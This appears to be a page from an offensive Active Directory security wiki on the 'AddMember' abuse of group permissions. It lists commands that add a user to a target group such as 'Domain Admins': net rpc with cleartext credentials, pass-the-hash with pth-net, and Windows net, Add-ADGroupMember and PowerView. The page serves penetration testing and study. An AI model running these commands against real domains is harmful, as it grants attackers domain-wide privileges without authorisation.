AddMember
This abuse can be carried out when controlling an object that has AllExtendedRights, Self, WriteProperty, GenericWrite or GenericAll over a target group.
UNIX-like
Windows
It can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.
1
# With net and cleartext credentials (will be prompted)
2
net rpc group addmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser -S $DomainController
3
โ€‹
4
# With net and cleartext credentials
5
net rpc group addmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser%$Password -S $DomainController
6
โ€‹
7
# With Pass-the-Hash
8
pth-net rpc group addmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser%ffffffffffffffffffffffffffffffff:$NThash -S $DomainController
Copied!
The attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).
1
# Command line
2
net group 'Domain Admins' 'user' /add /domain
3
โ€‹
4
# Powershell: Active Directory module
5
Add-ADGroupMember -Identity 'Domain Admins' -Members 'user'
6
โ€‹
7
# Powershell: PowerSploit module
8
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'
Copied!
Last modified 1mo ago
Copy link